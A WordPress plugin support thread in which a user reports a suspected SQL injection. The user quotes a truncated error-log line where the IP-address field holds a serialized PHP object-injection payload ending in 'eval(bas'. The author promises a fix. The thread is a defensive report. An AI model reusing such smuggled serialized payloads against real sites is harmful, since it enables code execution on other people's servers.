SQL injection vulnerability

  • Alta

    (@shellardee)


    6 years, 5 months ago

    Our php error log shows some kind of SQL injection vulnerability.

    “[25-Oct-2017 07:56:15 UTC] WordPress database error Illegal mix of collations (utf8_general_ci,IMPLICIT) and (utf8mb4_unicode_ci,COERCIBLE) for operation ‘=’ for query SELECT COUNT(hit_id) AS ct FROM ahc_hits WHERE DATE(hit_date) = DATE(NOW()) AND hit_ip_address = ‘}__test|O:21:\\\”JDatabaseDriverMysqli\\\”:3:{s:2:\\\”fc\\\”;O:17:\\\”JSimplepieFactory\\\”:0:{}s:21:\\\”\\\\0\\\\0\\\\0disconnectHandlers\\\”;a:1:{i:0;a:2:{i:0;O:9:\\\”SimplePie\\\”:5:{s:8:\\\”sanitize\\\”;O:20:\\\”JDatabaseDriverMysql\\\”:0:{}s:8:\\\”feed_url\\\”;s:6448:\\\”eval(bas …”

    I truncated the error.

    You can see here that they’ve somehow replaced the ‘hit ip address’ variable with code.

    Can you fix this asap?

    Thanks!

Viewing 1 replies (of 1 total)
  • Plugin Author wp-buy

    (@wp-buy)

    6 years ago

    thank you for reporting this,
    for sure, our developers will take care of this

    i will update this topic once we handle the error

    regards

Viewing 1 replies (of 1 total)
  • The topic ‘SQL injection vulnerability’ is closed to new replies.